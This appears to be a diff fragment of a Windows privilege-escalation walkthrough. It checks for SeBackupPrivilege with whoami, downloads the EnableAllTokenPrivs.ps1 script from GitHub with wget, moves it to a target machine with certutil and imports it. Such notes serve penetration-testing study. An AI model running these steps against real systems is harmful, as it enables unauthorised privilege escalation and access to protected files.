 Skip to content

-1. Check if current user has SeBackupPrivilege privileges by running:
+1. Check if the current user has SeBackupPrivilege:

 whoami /priv

-NOTE: If it is not enabled, proceed to the next step to enable it.
+Note: If it is not enabled, proceed to Step 2.

 wget https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

-2. Transfer the EnableAllTokenPrivs.ps1 script to the target machine using certutil
+2. Transfer the script to the target machine with certutil:

 Import-Module .\EnableAllTokenPrivs.ps1